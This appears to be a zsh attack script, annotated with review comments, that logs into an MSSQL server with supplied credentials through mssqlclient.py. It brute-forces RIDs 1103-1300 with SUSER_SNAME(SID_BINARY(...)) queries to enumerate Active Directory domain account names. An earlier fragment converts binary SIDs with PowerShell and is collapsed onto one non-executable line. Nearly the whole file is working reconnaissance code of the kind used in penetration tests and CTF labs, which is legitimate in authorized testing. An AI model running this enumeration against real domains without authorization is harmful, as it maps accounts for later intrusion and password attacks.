#!/bin/zsh
# Resolves Windows account names from a domain SID by asking an MSSQL server
# (via mssqlclient.py) for SUSER_SNAME(SID_BINARY(...)) over a range of RIDs.
#
# Requires, from the environment / an earlier part of the file not shown here:
#   USER, PASSWORD, SERVER  - credentials and host passed to mssqlclient.py
#   DOMAIN                  - NetBIOS domain name used to filter query output
#   SIDS_OUTPUT             - path of the "group|sid" file read by main()
#   print_success, print_info - output helpers (not defined in this view)
# NOTE(review): `USER` is also the shell's own login-name variable; confirm it
# is set to the intended MSSQL user before running.
#
# The line below is the tail of a definition whose header (the "# VARS" block,
# the GROUPS array and the loop opening) lies outside this view; it is kept
# exactly as found and is not executable as it stands. It reads a binary SID
# from the server, converts it to S-1-5-... form with pwsh.exe and appends
# "group|sid" to SIDS_OUTPUT, which is the format enumerate_all_from_sids_output
# expects.
# VARS GROUPS=("${(@f)$( binary.sql binary=$(mssqlclient.py "DC01/${USER}:$PASSWORD@$SERVER" -file binary.sql | grep -a -o "b'[^']*'" | sed "s/^b'//;s/'$//") if [[ -n ${binary} ]]; then binary=$(pwsh.exe -c " \$BinarySID = '${binary}'; \$SIDBytes = [byte[]]::new(\$BinarySID.Length / 2); for (\$i = 0; \$i -lt \$BinarySID.Length; \$i += 2) { \$SIDBytes[\$i / 2] = [convert]::ToByte(\$BinarySID.Substring(\$i, 2), 16) } \$SID = New-Object System.Security.Principal.SecurityIdentifier(\$SIDBytes, 0); \$SID.Value ") print_success "$group = $binary" echo -e "${group}|$binary" >> ${SIDS_OUTPUT} fi rm binary.sql done }

#######################################
# Resolve account names for every RID in a range under one domain SID.
# Globals:   USER, PASSWORD, SERVER, DOMAIN (read); also leaks
#            user_by_sid_sql_query and result into global scope (not local)
# Arguments: $1 - a full SID; its last "-<RID>" component is stripped to get
#                 the domain SID prefix
#            $2 - first RID to try (default 1103)
#            $3 - last RID to try (default 1300)
# Outputs:   one print_success line per resolved "DOMAIN\name" on stdout
# Returns:   status of the last command run in the loop
# Side effects: writes and removes ./query.sql on every iteration (fixed name
#            in the working directory, not mktemp; concurrent runs in the same
#            directory would clobber each other's file).
# Note: every RID costs a separate mssqlclient.py login plus one query, so a
# full default range is ~200 logins; these show up as a burst of logons and
# SUSER_SNAME queries in SQL Server audit / error logs.
#######################################
function usernameEnumerationBySID() {
  local SID_BASE=$1
  local RID_START=${2:-1103}
  local RID_END=${3:-1300}
  local rid
  # Strip CR and whitespace (SIDS_OUTPUT may come from Windows tooling), then
  # drop the trailing "-<digits>" so only the domain SID prefix remains.
  # NOTE(review): `local x=$(...)` masks the pipeline's exit status.
  local SID_DOMAIN=$(echo "$SID_BASE" | tr -d '\r' | tr -d '[:space:]' | sed 's/-[0-9]\+$//')
  for (( rid=RID_START; rid<=RID_END; rid++ )); do
    # One T-SQL statement per RID; the server resolves the SID to an account
    # name or returns NULL for an unused RID.
    user_by_sid_sql_query="SELECT SUSER_SNAME(SID_BINARY(N'${SID_DOMAIN}-${rid}'))"
    echo "$user_by_sid_sql_query" > query.sql
    # stderr is discarded, so an authentication or connection failure is
    # indistinguishable from "no such RID" - the loop just prints nothing.
    # The password is passed on the command line and is visible in process
    # listings for the lifetime of each mssqlclient.py call.
    # grep pattern is BRE: a literal backslash, DOMAIN, a literal backslash.
    # NOTE(review): SUSER_SNAME normally yields "DOMAIN\name" with no leading
    # backslash; confirm the leading '\\' matches real mssqlclient.py output.
    result=$(mssqlclient.py "DC01/${USER}:$PASSWORD@$SERVER" -file query.sql 2>/dev/null | tr -d '\r' | grep -a '\\'"${DOMAIN}"'\\')
    rm -f query.sql
    if [[ -n $result ]]; then
      # Pull just "DOMAIN\name" out of the table-formatted line ("\\\\" in
      # double quotes becomes a single literal backslash for sed).
      # The while body runs in a pipeline subshell; it only prints, so no
      # state is lost.
      echo "$result" | sed -n "s/.*\(${DOMAIN}\\\\[^[:space:]]*\).*/\1/p" | while read -r user; do
        [[ -n $user ]] && print_success "${user}"
      done
    fi
  done
}

#######################################
# Run usernameEnumerationBySID for every "group|sid" line in SIDS_OUTPUT.
# Globals:   SIDS_OUTPUT (read)
# Arguments: none
# Outputs:   print_info header per group and print_success per account,
#            piped through `sort -u` - so, if the print_* helpers write to
#            stdout, headers and names are de-duplicated and re-ordered
#            together and no longer appear grouped under their header.
# Returns:   0 silently when SIDS_OUTPUT does not exist
#######################################
function enumerate_all_from_sids_output() {
  [[ -f $SIDS_OUTPUT ]] || return
  while IFS='|' read -r group sid_base; do
    # Skip malformed lines (missing group or SID).
    [[ -z $group || -z $sid_base ]] && continue
    print_info "${group}:"
    usernameEnumerationBySID "$sid_base" 1103 1300
  done < "$SIDS_OUTPUT" | sort -u
}

#######################################
# Entry point. The SID-collection step (bruteSID) is commented out, so
# SIDS_OUTPUT must already exist from a previous run.
#######################################
function main() {
  # bruteSID
  enumerate_all_from_sids_output
}
main